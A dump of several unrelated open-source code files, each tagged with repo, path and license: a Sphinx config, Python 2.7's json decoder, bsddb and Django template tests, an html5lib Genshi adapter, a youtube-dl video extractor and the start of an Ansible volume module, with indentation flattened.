self.assertRaises( ClientFatalError, parse_link, 'u,h,,' )
self.assertRaises( ClientFatalError, parse_link, 'u,h,a' )
self.assertRaises( ClientFatalError, parse_link, 'u,h,a=' )
self.assertRaises( ClientFatalError, parse_link, 'u,h,a=b,=c' )
def test04_parse_capabilities(self):
# Input string of the form: cap_name=uri,cap_name=uri
self.assertRaises( ClientFatalError, parse_capabilities, 'a' )
#self.assertRaises( ClientFatalError, parse_capabilities, 'a=' )
self.assertRaises( ClientFatalError, parse_capabilities, 'a=b,' )
#self.assertRaises( ClientFatalError, parse_capabilities, 'a=b,c=' )
def test05_parse_capability_lists(self):
# Input string of the form: uri,uri
self.assertEqual( parse_capability_lists('a,b'), ['a','b'] )
if __name__ == '__main__':
suite = unittest.defaultTestLoader.loadTestsFromTestCase(TestClientUtils)
unittest.TextTestRunner(verbosity=2).run(suite)
| apache-2.0 |
junkoda/fs2 | doc/conf.py | 1 | 10050 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# fs documentation build configuration file, created by
# sphinx-quickstart on Sun Jun 5 18:48:51 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.mathjax',
'sphinx.ext.githubpages',
'sphinx.ext.autodoc', 'sphinx.ext.napoleon',
]
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = False
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'fs'
copyright = '2016, Jun Koda'
author = 'Jun Koda'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.0'
# The full version, including alpha/beta/rc tags.
release = '0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#
# html_title = 'fs v0.0'
# A shorter title for the navigation bar. Default is the same as html_title.
#
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#
# html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#
# html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#
# html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#
# html_additional_pages = {}
# If false, no module index is generated.
#
# html_domain_indices = True
# If false, no index is generated.
#
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#
# html_split_index = False
# If true, links to the reST sources are added to the pages.
#
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
#
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'fsdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'fs.tex', 'fs Documentation',
'Jun Koda', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#
# latex_use_parts = False
# If true, show page references after internal links.
#
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
#
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
#
# latex_appendices = []
# If false, no module index is generated.
#
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'fs', 'fs Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'fs', 'fs Documentation',
author, 'fs', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#
# texinfo_appendices = []
# If false, no module index is generated.
#
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#
# texinfo_no_detailmenu = False
| gpl-3.0 |
blackzw/openwrt_sdk_dev1 | staging_dir/host/lib/python2.7/json/decoder.py | 65 | 13785 | """Implementation of JSONDecoder
"""
import re
import sys
import struct
from json import scanner
try:
from _json import scanstring as c_scanstring
except ImportError:
c_scanstring = None
__all__ = ['JSONDecoder']
FLAGS = re.VERBOSE | re.MULTILINE | re.DOTALL
def _floatconstants():
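    # 16 bytes: the big-endian IEEE-754 doubles for a quiet NaN
    # (7FF8000000000000) followed by +Infinity (7FF0000000000000);
    # each 8-byte half is reversed below on little-endian platforms.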
_BYTES = '7FF80000000000007FF0000000000000'.decode('hex')
if sys.byteorder != 'big':
_BYTES = _BYTES[:8][::-1] + _BYTES[8:][::-1]
nan, inf = struct.unpack('dd', _BYTES)
return nan, inf, -inf
NaN, PosInf, NegInf = _floatconstants()
def linecol(doc, pos):
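    # e.g. linecol('ab\ncd', 4) == (2, 2)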
lineno = doc.count('\n', 0, pos) + 1
if lineno == 1:
colno = pos
else:
colno = pos - doc.rindex('\n', 0, pos)
return lineno, colno
def errmsg(msg, doc, pos, end=None):
# Note that this function is called from _json
lineno, colno = linecol(doc, pos)
if end is None:
fmt = '{0}: line {1} column {2} (char {3})'
return fmt.format(msg, lineno, colno, pos)
#fmt = '%s: line %d column %d (char %d)'
#return fmt % (msg, lineno, colno, pos)
endlineno, endcolno = linecol(doc, end)
fmt = '{0}: line {1} column {2} - line {3} column {4} (char {5} - {6})'
return fmt.format(msg, lineno, colno, endlineno, endcolno, pos, end)
#fmt = '%s: line %d column %d - line %d column %d (char %d - %d)'
#return fmt % (msg, lineno, colno, endlineno, endcolno, pos, end)
_CONSTANTS = {
'-Infinity': NegInf,
'Infinity': PosInf,
'NaN': NaN,
}
STRINGCHUNK = re.compile(r'(.*?)(["\\\x00-\x1f])', FLAGS)
BACKSLASH = {
'"': u'"', '\\': u'\\', '/': u'/',
'b': u'\b', 'f': u'\f', 'n': u'\n', 'r': u'\r', 't': u'\t',
}
DEFAULT_ENCODING = "utf-8"
def py_scanstring(s, end, encoding=None, strict=True,
_b=BACKSLASH, _m=STRINGCHUNK.match):
"""Scan the string s for a JSON string. End is the index of the
character in s after the quote that started the JSON string.
Unescapes all valid JSON string escape sequences and raises ValueError
on attempt to decode an invalid string. If strict is False then literal
control characters are allowed in the string.
Returns a tuple of the decoded string and the index of the character in s
after the end quote."""
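    # e.g. py_scanstring('"abc" ...', 1) == (u'abc', 5)
    #      py_scanstring(r'"a\nb"', 1) == (u'a\nb', 6)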
if encoding is None:
encoding = DEFAULT_ENCODING
chunks = []
_append = chunks.append
begin = end - 1
while 1:
chunk = _m(s, end)
if chunk is None:
raise ValueError(
errmsg("Unterminated string starting at", s, begin))
end = chunk.end()
content, terminator = chunk.groups()
        # Content contains zero or more unescaped string characters
if content:
if not isinstance(content, unicode):
content = unicode(content, encoding)
_append(content)
# Terminator is the end of string, a literal control character,
# or a backslash denoting that an escape sequence follows
if terminator == '"':
break
elif terminator != '\\':
if strict:
#msg = "Invalid control character %r at" % (terminator,)
msg = "Invalid control character {0!r} at".format(terminator)
raise ValueError(errmsg(msg, s, end))
else:
_append(terminator)
continue
try:
esc = s[end]
except IndexError:
raise ValueError(
errmsg("Unterminated string starting at", s, begin))
# If not a unicode escape sequence, must be in the lookup table
if esc != 'u':
try:
char = _b[esc]
except KeyError:
msg = "Invalid \\escape: " + repr(esc)
raise ValueError(errmsg(msg, s, end))
end += 1
else:
# Unicode escape sequence
esc = s[end + 1:end + 5]
next_end = end + 5
if len(esc) != 4:
msg = "Invalid \\uXXXX escape"
raise ValueError(errmsg(msg, s, end))
uni = int(esc, 16)
# Check for surrogate pair on UCS-4 systems
if 0xd800 <= uni <= 0xdbff and sys.maxunicode > 65535:
msg = "Invalid \\uXXXX\\uXXXX surrogate pair"
if not s[end + 5:end + 7] == '\\u':
raise ValueError(errmsg(msg, s, end))
esc2 = s[end + 7:end + 11]
if len(esc2) != 4:
raise ValueError(errmsg(msg, s, end))
uni2 = int(esc2, 16)
uni = 0x10000 + (((uni - 0xd800) << 10) | (uni2 - 0xdc00))
next_end += 6
char = unichr(uni)
end = next_end
# Append the unescaped character
_append(char)
return u''.join(chunks), end
# Use speedup if available
scanstring = c_scanstring or py_scanstring
WHITESPACE = re.compile(r'[ \t\n\r]*', FLAGS)
WHITESPACE_STR = ' \t\n\r'
def JSONObject(s_and_end, encoding, strict, scan_once, object_hook,
object_pairs_hook, _w=WHITESPACE.match, _ws=WHITESPACE_STR):
s, end = s_and_end
pairs = []
pairs_append = pairs.append
# Use a slice to prevent IndexError from being raised, the following
# check will raise a more specific ValueError if the string is empty
nextchar = s[end:end + 1]
# Normally we expect nextchar == '"'
if nextchar != '"':
if nextchar in _ws:
end = _w(s, end).end()
nextchar = s[end:end + 1]
# Trivial empty object
if nextchar == '}':
if object_pairs_hook is not None:
result = object_pairs_hook(pairs)
return result, end
pairs = {}
if object_hook is not None:
pairs = object_hook(pairs)
return pairs, end + 1
elif nextchar != '"':
raise ValueError(errmsg("Expecting property name", s, end))
end += 1
while True:
key, end = scanstring(s, end, encoding, strict)
# To skip some function call overhead we optimize the fast paths where
# the JSON key separator is ": " or just ":".
if s[end:end + 1] != ':':
end = _w(s, end).end()
if s[end:end + 1] != ':':
raise ValueError(errmsg("Expecting : delimiter", s, end))
end += 1
try:
if s[end] in _ws:
end += 1
if s[end] in _ws:
end = _w(s, end + 1).end()
except IndexError:
pass
try:
value, end = scan_once(s, end)
except StopIteration:
raise ValueError(errmsg("Expecting object", s, end))
pairs_append((key, value))
try:
nextchar = s[end]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end]
except IndexError:
nextchar = ''
end += 1
if nextchar == '}':
break
elif nextchar != ',':
raise ValueError(errmsg("Expecting , delimiter", s, end - 1))
try:
nextchar = s[end]
if nextchar in _ws:
end += 1
nextchar = s[end]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end]
except IndexError:
nextchar = ''
end += 1
if nextchar != '"':
raise ValueError(errmsg("Expecting property name", s, end - 1))
if object_pairs_hook is not None:
result = object_pairs_hook(pairs)
return result, end
pairs = dict(pairs)
if object_hook is not None:
pairs = object_hook(pairs)
return pairs, end
def JSONArray(s_and_end, scan_once, _w=WHITESPACE.match, _ws=WHITESPACE_STR):
s, end = s_and_end
values = []
nextchar = s[end:end + 1]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end:end + 1]
# Look-ahead for trivial empty array
if nextchar == ']':
return values, end + 1
_append = values.append
while True:
try:
value, end = scan_once(s, end)
except StopIteration:
raise ValueError(errmsg("Expecting object", s, end))
_append(value)
nextchar = s[end:end + 1]
if nextchar in _ws:
end = _w(s, end + 1).end()
nextchar = s[end:end + 1]
end += 1
if nextchar == ']':
break
elif nextchar != ',':
raise ValueError(errmsg("Expecting , delimiter", s, end))
try:
if s[end] in _ws:
end += 1
if s[end] in _ws:
end = _w(s, end + 1).end()
except IndexError:
pass
return values, end
class JSONDecoder(object):
"""Simple JSON <http://json.org> decoder
Performs the following translations in decoding by default:
+---------------+-------------------+
| JSON | Python |
+===============+===================+
| object | dict |
+---------------+-------------------+
| array | list |
+---------------+-------------------+
| string | unicode |
+---------------+-------------------+
| number (int) | int, long |
+---------------+-------------------+
| number (real) | float |
+---------------+-------------------+
| true | True |
+---------------+-------------------+
| false | False |
+---------------+-------------------+
| null | None |
+---------------+-------------------+
It also understands ``NaN``, ``Infinity``, and ``-Infinity`` as
their corresponding ``float`` values, which is outside the JSON spec.
"""
def __init__(self, encoding=None, object_hook=None, parse_float=None,
parse_int=None, parse_constant=None, strict=True,
object_pairs_hook=None):
"""``encoding`` determines the encoding used to interpret any ``str``
objects decoded by this instance (utf-8 by default). It has no
effect when decoding ``unicode`` objects.
Note that currently only encodings that are a superset of ASCII work,
strings of other encodings should be passed in as ``unicode``.
``object_hook``, if specified, will be called with the result
of every JSON object decoded and its return value will be used in
place of the given ``dict``. This can be used to provide custom
deserializations (e.g. to support JSON-RPC class hinting).
``object_pairs_hook``, if specified will be called with the result of
every JSON object decoded with an ordered list of pairs. The return
value of ``object_pairs_hook`` will be used instead of the ``dict``.
This feature can be used to implement custom decoders that rely on the
order that the key and value pairs are decoded (for example,
collections.OrderedDict will remember the order of insertion). If
``object_hook`` is also defined, the ``object_pairs_hook`` takes
priority.
``parse_float``, if specified, will be called with the string
of every JSON float to be decoded. By default this is equivalent to
float(num_str). This can be used to use another datatype or parser
for JSON floats (e.g. decimal.Decimal).
``parse_int``, if specified, will be called with the string
of every JSON int to be decoded. By default this is equivalent to
int(num_str). This can be used to use another datatype or parser
for JSON integers (e.g. float).
``parse_constant``, if specified, will be called with one of the
following strings: -Infinity, Infinity, NaN.
This can be used to raise an exception if invalid JSON numbers
are encountered.
If ``strict`` is false (true is the default), then control
characters will be allowed inside strings. Control characters in
this context are those with character codes in the 0-31 range,
including ``'\\t'`` (tab), ``'\\n'``, ``'\\r'`` and ``'\\0'``.
"""
self.encoding = encoding
self.object_hook = object_hook
self.object_pairs_hook = object_pairs_hook
self.parse_float = parse_float or float
self.parse_int = parse_int or int
self.parse_constant = parse_constant or _CONSTANTS.__getitem__
self.strict = strict
self.parse_object = JSONObject
self.parse_array = JSONArray
self.parse_string = scanstring
self.scan_once = scanner.make_scanner(self)
def decode(self, s, _w=WHITESPACE.match):
"""Return the Python representation of ``s`` (a ``str`` or ``unicode``
instance containing a JSON document)
"""
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
end = _w(s, end).end()
if end != len(s):
raise ValueError(errmsg("Extra data", s, end, len(s)))
return obj
def raw_decode(self, s, idx=0):
"""Decode a JSON document from ``s`` (a ``str`` or ``unicode``
beginning with a JSON document) and return a 2-tuple of the Python
representation and the index in ``s`` where the document ended.
This can be used to decode a JSON document from a string that may
have extraneous data at the end.
"""
try:
obj, end = self.scan_once(s, idx)
except StopIteration:
raise ValueError("No JSON object could be decoded")
return obj, end
| gpl-2.0 |
vFense/vFenseAgent-nix | agent/deps/rpm6/Python-2.7.5/lib/python2.7/bsddb/test/test_misc.py | 68 | 4803 | """Miscellaneous bsddb module test cases
"""
import os, sys
import unittest
from test_all import db, dbshelve, hashopen, test_support, get_new_environment_path, get_new_database_path
#----------------------------------------------------------------------
class MiscTestCase(unittest.TestCase):
def setUp(self):
self.filename = get_new_database_path()
self.homeDir = get_new_environment_path()
def tearDown(self):
test_support.unlink(self.filename)
test_support.rmtree(self.homeDir)
def test01_badpointer(self):
dbs = dbshelve.open(self.filename)
dbs.close()
self.assertRaises(db.DBError, dbs.get, "foo")
def test02_db_home(self):
env = db.DBEnv()
# check for crash fixed when db_home is used before open()
self.assertTrue(env.db_home is None)
env.open(self.homeDir, db.DB_CREATE)
if sys.version_info[0] < 3 :
self.assertEqual(self.homeDir, env.db_home)
else :
self.assertEqual(bytes(self.homeDir, "ascii"), env.db_home)
def test03_repr_closed_db(self):
db = hashopen(self.filename)
db.close()
rp = repr(db)
self.assertEqual(rp, "{}")
def test04_repr_db(self) :
db = hashopen(self.filename)
d = {}
for i in xrange(100) :
db[repr(i)] = repr(100*i)
d[repr(i)] = repr(100*i)
db.close()
db = hashopen(self.filename)
rp = repr(db)
self.assertEqual(rp, repr(d))
db.close()
# http://sourceforge.net/tracker/index.php?func=detail&aid=1708868&group_id=13900&atid=313900
#
# See the bug report for details.
#
# The problem was that make_key_dbt() was not allocating a copy of
# string keys but FREE_DBT() was always being told to free it when the
# database was opened with DB_THREAD.
def test05_double_free_make_key_dbt(self):
try:
db1 = db.DB()
db1.open(self.filename, None, db.DB_BTREE,
db.DB_CREATE | db.DB_THREAD)
curs = db1.cursor()
t = curs.get("/foo", db.DB_SET)
# double free happened during exit from DBC_get
finally:
db1.close()
test_support.unlink(self.filename)
def test06_key_with_null_bytes(self):
try:
db1 = db.DB()
db1.open(self.filename, None, db.DB_HASH, db.DB_CREATE)
db1['a'] = 'eh?'
db1['a\x00'] = 'eh zed.'
db1['a\x00a'] = 'eh zed eh?'
db1['aaa'] = 'eh eh eh!'
keys = db1.keys()
keys.sort()
self.assertEqual(['a', 'a\x00', 'a\x00a', 'aaa'], keys)
self.assertEqual(db1['a'], 'eh?')
self.assertEqual(db1['a\x00'], 'eh zed.')
self.assertEqual(db1['a\x00a'], 'eh zed eh?')
self.assertEqual(db1['aaa'], 'eh eh eh!')
finally:
db1.close()
test_support.unlink(self.filename)
def test07_DB_set_flags_persists(self):
try:
db1 = db.DB()
db1.set_flags(db.DB_DUPSORT)
db1.open(self.filename, db.DB_HASH, db.DB_CREATE)
db1['a'] = 'eh'
db1['a'] = 'A'
self.assertEqual([('a', 'A')], db1.items())
db1.put('a', 'Aa')
self.assertEqual([('a', 'A'), ('a', 'Aa')], db1.items())
db1.close()
db1 = db.DB()
# no set_flags call, we're testing that it reads and obeys
# the flags on open.
db1.open(self.filename, db.DB_HASH)
self.assertEqual([('a', 'A'), ('a', 'Aa')], db1.items())
# if it read the flags right this will replace all values
# for key 'a' instead of adding a new one. (as a dict should)
db1['a'] = 'new A'
self.assertEqual([('a', 'new A')], db1.items())
finally:
db1.close()
test_support.unlink(self.filename)
def test08_ExceptionTypes(self) :
self.assertTrue(issubclass(db.DBError, Exception))
for i, j in db.__dict__.items() :
if i.startswith("DB") and i.endswith("Error") :
self.assertTrue(issubclass(j, db.DBError), msg=i)
if i not in ("DBKeyEmptyError", "DBNotFoundError") :
self.assertFalse(issubclass(j, KeyError), msg=i)
        # These two exceptions have two bases
self.assertTrue(issubclass(db.DBKeyEmptyError, KeyError))
self.assertTrue(issubclass(db.DBNotFoundError, KeyError))
#----------------------------------------------------------------------
def test_suite():
return unittest.makeSuite(MiscTestCase)
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
| lgpl-3.0 |
IT-Department-Projects/OOAD-Project | Flask_App/oakcrest/lib/python2.7/site-packages/pip/_vendor/html5lib/treeadapters/genshi.py | 356 | 1555 | from __future__ import absolute_import, division, unicode_literals
from genshi.core import QName, Attrs
from genshi.core import START, END, TEXT, COMMENT, DOCTYPE
def to_genshi(walker):
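    """Convert an html5lib treewalker token stream into Genshi stream events."""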
text = []
for token in walker:
type = token["type"]
if type in ("Characters", "SpaceCharacters"):
text.append(token["data"])
elif text:
yield TEXT, "".join(text), (None, -1, -1)
text = []
if type in ("StartTag", "EmptyTag"):
if token["namespace"]:
name = "{%s}%s" % (token["namespace"], token["name"])
else:
name = token["name"]
attrs = Attrs([(QName("{%s}%s" % attr if attr[0] is not None else attr[1]), value)
for attr, value in token["data"].items()])
yield (START, (QName(name), attrs), (None, -1, -1))
if type == "EmptyTag":
type = "EndTag"
if type == "EndTag":
if token["namespace"]:
name = "{%s}%s" % (token["namespace"], token["name"])
else:
name = token["name"]
yield END, QName(name), (None, -1, -1)
elif type == "Comment":
yield COMMENT, token["data"], (None, -1, -1)
elif type == "Doctype":
yield DOCTYPE, (token["name"], token["publicId"],
token["systemId"]), (None, -1, -1)
else:
pass # FIXME: What to do?
if text:
yield TEXT, "".join(text), (None, -1, -1)
| mit |
jylaxp/django | tests/template_tests/syntax_tests/test_list_index.py | 521 | 2694 | from django.test import SimpleTestCase
from ..utils import setup
class ListIndexTests(SimpleTestCase):
@setup({'list-index01': '{{ var.1 }}'})
def test_list_index01(self):
"""
List-index syntax allows a template to access a certain item of a
subscriptable object.
"""
output = self.engine.render_to_string('list-index01', {'var': ['first item', 'second item']})
self.assertEqual(output, 'second item')
@setup({'list-index02': '{{ var.5 }}'})
def test_list_index02(self):
"""
Fail silently when the list index is out of range.
"""
output = self.engine.render_to_string('list-index02', {'var': ['first item', 'second item']})
if self.engine.string_if_invalid:
self.assertEqual(output, 'INVALID')
else:
self.assertEqual(output, '')
@setup({'list-index03': '{{ var.1 }}'})
def test_list_index03(self):
"""
Fail silently when the list index is out of range.
"""
output = self.engine.render_to_string('list-index03', {'var': None})
if self.engine.string_if_invalid:
self.assertEqual(output, 'INVALID')
else:
self.assertEqual(output, '')
@setup({'list-index04': '{{ var.1 }}'})
def test_list_index04(self):
"""
Fail silently when variable is a dict without the specified key.
"""
output = self.engine.render_to_string('list-index04', {'var': {}})
if self.engine.string_if_invalid:
self.assertEqual(output, 'INVALID')
else:
self.assertEqual(output, '')
@setup({'list-index05': '{{ var.1 }}'})
def test_list_index05(self):
"""
Dictionary lookup wins out when dict's key is a string.
"""
output = self.engine.render_to_string('list-index05', {'var': {'1': "hello"}})
self.assertEqual(output, 'hello')
@setup({'list-index06': '{{ var.1 }}'})
def test_list_index06(self):
"""
But list-index lookup wins out when dict's key is an int, which
behind the scenes is really a dictionary lookup (for a dict)
after converting the key to an int.
"""
output = self.engine.render_to_string('list-index06', {"var": {1: "hello"}})
self.assertEqual(output, 'hello')
@setup({'list-index07': '{{ var.1 }}'})
def test_list_index07(self):
"""
Dictionary lookup wins out when there is a string and int version
of the key.
"""
output = self.engine.render_to_string('list-index07', {"var": {'1': "hello", 1: "world"}})
self.assertEqual(output, 'hello')
| bsd-3-clause |
thedep2/CouchPotatoServer | couchpotato/core/media/movie/providers/trailer/youtube_dl/extractor/moevideo.py | 15 | 3685 | # coding: utf-8
from __future__ import unicode_literals
import json
import re
from .common import InfoExtractor
from ..compat import (
compat_urllib_parse,
compat_urllib_request,
)
from ..utils import (
ExtractorError,
int_or_none,
)
class MoeVideoIE(InfoExtractor):
IE_DESC = 'LetitBit video services: moevideo.net, playreplay.net and videochart.net'
_VALID_URL = r'''(?x)
https?://(?P<host>(?:www\.)?
(?:(?:moevideo|playreplay|videochart)\.net))/
(?:video|framevideo)/(?P<id>[0-9]+\.[0-9A-Za-z]+)'''
_API_URL = 'http://api.letitbit.net/'
_API_KEY = 'tVL0gjqo5'
_TESTS = [
{
'url': 'http://moevideo.net/video/00297.0036103fe3d513ef27915216fd29',
'md5': '129f5ae1f6585d0e9bb4f38e774ffb3a',
'info_dict': {
'id': '00297.0036103fe3d513ef27915216fd29',
'ext': 'flv',
'title': 'Sink cut out machine',
'description': 'md5:f29ff97b663aefa760bf7ca63c8ca8a8',
'thumbnail': 're:^https?://.*\.jpg$',
'width': 540,
'height': 360,
'duration': 179,
'filesize': 17822500,
}
},
{
'url': 'http://playreplay.net/video/77107.7f325710a627383d40540d8e991a',
'md5': '74f0a014d5b661f0f0e2361300d1620e',
'info_dict': {
'id': '77107.7f325710a627383d40540d8e991a',
'ext': 'flv',
'title': 'Operacion Condor.',
'description': 'md5:7e68cb2fcda66833d5081c542491a9a3',
'thumbnail': 're:^https?://.*\.jpg$',
'width': 480,
'height': 296,
'duration': 6027,
'filesize': 588257923,
}
},
]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
webpage = self._download_webpage(
'http://%s/video/%s' % (mobj.group('host'), video_id),
video_id, 'Downloading webpage')
title = self._og_search_title(webpage)
thumbnail = self._og_search_thumbnail(webpage)
description = self._og_search_description(webpage)
r = [
self._API_KEY,
[
'preview/flv_link',
{
'uid': video_id,
},
],
]
r_json = json.dumps(r)
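        # For illustration, r_json now serializes to something like
        # (uid shortened): '["tVL0gjqo5", ["preview/flv_link", {"uid": "00297.0036..."}]]'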
post = compat_urllib_parse.urlencode({'r': r_json})
req = compat_urllib_request.Request(self._API_URL, post)
req.add_header('Content-type', 'application/x-www-form-urlencoded')
response = self._download_json(req, video_id)
if response['status'] != 'OK':
raise ExtractorError(
'%s returned error: %s' % (self.IE_NAME, response['data']),
expected=True
)
item = response['data'][0]
video_url = item['link']
duration = int_or_none(item['length'])
width = int_or_none(item['width'])
height = int_or_none(item['height'])
filesize = int_or_none(item['convert_size'])
formats = [{
'format_id': 'sd',
'http_headers': {'Range': 'bytes=0-'}, # Required to download
'url': video_url,
'width': width,
'height': height,
'filesize': filesize,
}]
return {
'id': video_id,
'title': title,
'thumbnail': thumbnail,
'description': description,
'duration': duration,
'formats': formats,
}
| gpl-3.0 |
romain-dartigues/ansible | lib/ansible/modules/storage/netapp/na_elementsw_volume.py | 7 | 13498 | #!/usr/bin/python
# (c) 2017, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
"""Element OS Software Volume Manager"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = '''
module: na_elementsw_volume
short_description: NetApp Element Software Manage Volumes
extends_documentation_fragment:
- netapp.solidfire
version_added: '2.7'
author: NetApp Ansible Team (@carchi8py) <[email protected]>
description:
- Create, destroy, or update volumes on ElementSW
options:
state:
description:
- Whether the specified volume should exist or not.
required: true
choices: ['present', 'absent']
name:
description:
- The name of the volume to manage.
- It accepts volume_name or volume_id
required: true
account_id:
description:
- Account ID for the owner of this volume.
- It accepts Account_id or Account_name
required: true
enable512e:
description:
- Required when C(state=present)
- Should the volume provide 512-byte sector emulation?
type: bool
aliases:
- 512emulation
qos:
description: Initial quality of service settings for this volume. Configure as dict in playbooks.
attributes:
description: A YAML dictionary of attributes that you would like to apply on this volume.
size:
description:
- The size of the volume in (size_unit).
- Required when C(state = present).
size_unit:
description:
- The unit used to interpret the size parameter.
choices: ['bytes', 'b', 'kb', 'mb', 'gb', 'tb', 'pb', 'eb', 'zb', 'yb']
default: 'gb'
access:
description:
- Access allowed for the volume.
- readOnly Only read operations are allowed.
- readWrite Reads and writes are allowed.
- locked No reads or writes are allowed.
- replicationTarget Identify a volume as the target volume for a paired set of volumes.
- If the volume is not paired, the access status is locked.
